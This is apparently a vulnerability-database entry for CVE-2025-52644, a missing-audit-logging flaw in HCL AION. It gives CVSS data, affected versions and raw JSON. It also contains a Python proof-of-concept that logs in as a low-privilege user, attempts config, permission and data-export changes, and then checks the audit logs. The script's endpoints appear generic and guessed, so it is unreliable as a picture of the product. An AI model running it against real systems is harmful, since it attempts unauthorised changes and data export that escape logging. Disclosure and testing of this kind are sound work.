Security Vulnerability Report
CVE-2025-52644 CVSS 5.8 MEDIUM

CVE-2025-52644

Published: 2026-03-16 15:16:19
Last Modified: 2026-04-28 21:42:04

Description

HCL AION is affected by a vulnerability where certain user actions are not adequately audited or logged. The absence of proper auditing mechanisms may reduce traceability of user activities and could potentially impact monitoring, accountability, or incident investigation processes.

CVSS Details

CVSS Score: 5.8
Severity: MEDIUM
CVSS Vector: CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:L/I:H/A:L

The figures above are the Secondary CVSS v3.1 metric in the record. The raw JSON data further down also carries a Primary metric with a different vector, CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:H/A:N, base score 8.2 (HIGH); check which one your triage process uses before assigning a priority.

Configurations (Affected Products)

cpe:2.3:a:hcltech:aion:*:*:*:*:*:*:*:* - VULNERABLE
HCL AION < fixed version
HCL AION, affected versions not stated here

Per the CPE match in the raw JSON data below, the affected range is HCL AION from 2.0.0 (inclusive) up to 2.1.2 (exclusive).

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
```python
# CVE-2025-52644 PoC - HCL AION missing audit log check
# This PoC demonstrates the lack of audit logging for certain user actions
import requests
import json

TARGET_URL = "https://target-aion-server.com"
API_ENDPOINT = "/api/v1/audit-check"


def check_audit_logging():
    """
    Check if user actions are properly logged in HCL AION
    """
    # Step 1: Authenticate with low-privilege account
    auth_payload = {
        "username": "standard_user",
        "password": "password123"
    }
    session = requests.Session()
    auth_response = session.post(f"{TARGET_URL}/auth/login", json=auth_payload)
    if auth_response.status_code != 200:
        print("[-] Authentication failed")
        return False
    print("[+] Authenticated successfully with low-privilege account")

    # Step 2: Perform sensitive operation
    sensitive_actions = [
        "/api/v1/config/modify",
        "/api/v1/users/permissions/change",
        "/api/v1/data/export"
    ]
    for action in sensitive_actions:
        response = session.post(f"{TARGET_URL}{action}", json={
            "action": "sensitive_operation",
            "target": "system_config"
        })
        if response.status_code == 200:
            print(f"[+] Action {action} executed successfully")

    # Step 3: Query audit logs
    audit_response = session.get(f"{TARGET_URL}/api/v1/audit/logs")
    audit_logs = audit_response.json()

    # Step 4: Check if actions were logged
    for action in sensitive_actions:
        if action not in str(audit_logs):
            print(f"[!] VULNERABLE: Action {action} NOT found in audit logs")
            return True
    print("[-] All actions were properly logged")
    return False


if __name__ == "__main__":
    print("CVE-2025-52644 - HCL AION Audit Logging Vulnerability Checker")
    print("=" * 60)
    check_audit_logging()
```

References

- https://support.hcl-software.com/csm?id=kb_article&sysparm_article=KB0129410 (Vendor Advisory)

Raw JSON Data

```json
{
  "cve": {
    "id": "CVE-2025-52644",
    "sourceIdentifier": "[email protected]",
    "published": "2026-03-16T15:16:18.567",
    "lastModified": "2026-04-28T21:42:03.900",
    "vulnStatus": "Analyzed",
    "cveTags": [],
    "descriptions": [
      {
        "lang": "en",
        "value": "HCL AION is affected by a vulnerability where certain user actions are not adequately audited or logged. The absence of proper auditing mechanisms may reduce traceability of user activities and could potentially impact monitoring, accountability, or incident investigation processes."
      },
      {
        "lang": "es",
        "value": "HCL AION se ve afectado por una vulnerabilidad donde ciertas acciones de usuario no son auditadas o registradas adecuadamente. La ausencia de mecanismos de auditoría adecuados puede reducir la trazabilidad de las actividades del usuario y podría potencialmente impactar los procesos de monitoreo, rendición de cuentas o investigación de incidentes."
      }
    ],
    "metrics": {
      "cvssMetricV31": [
        {
          "source": "[email protected]",
          "type": "Secondary",
          "cvssData": {
            "version": "3.1",
            "vectorString": "CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:L/I:H/A:L",
            "baseScore": 5.8,
            "baseSeverity": "MEDIUM",
            "attackVector": "LOCAL",
            "attackComplexity": "HIGH",
            "privilegesRequired": "LOW",
            "userInteraction": "NONE",
            "scope": "UNCHANGED",
            "confidentialityImpact": "LOW",
            "integrityImpact": "HIGH",
            "availabilityImpact": "LOW"
          },
          "exploitabilityScore": 1.0,
          "impactScore": 4.7
        },
        {
          "source": "[email protected]",
          "type": "Primary",
          "cvssData": {
            "version": "3.1",
            "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:H/A:N",
            "baseScore": 8.2,
            "baseSeverity": "HIGH",
            "attackVector": "NETWORK",
            "attackComplexity": "LOW",
            "privilegesRequired": "NONE",
            "userInteraction": "NONE",
            "scope": "UNCHANGED",
            "confidentialityImpact": "LOW",
            "integrityImpact": "HIGH",
            "availabilityImpact": "NONE"
          },
          "exploitabilityScore": 3.9,
          "impactScore": 4.2
        }
      ]
    },
    "weaknesses": [
      {
        "source": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
        "type": "Secondary",
        "description": [
          {"lang": "en", "value": "CWE-778"}
        ]
      }
    ],
    "configurations": [
      {
        "nodes": [
          {
            "operator": "OR",
            "negate": false,
            "cpeMatch": [
              {
                "vulnerable": true,
                "criteria": "cpe:2.3:a:hcltech:aion:*:*:*:*:*:*:*:*",
                "versionStartIncluding": "2.0.0",
                "versionEndExcluding": "2.1.2",
                "matchCriteriaId": "1AD0DD06-7840-4FFE-8BCF-1B94410B237D"
              }
            ]
          }
        ]
      }
    ],
    "references": [
      {
        "url": "https://support.hcl-software.com/csm?id=kb_article&sysparm_article=KB0129410",
        "source": "[email protected]",
        "tags": ["Vendor Advisory"]
      }
    ]
  }
}
```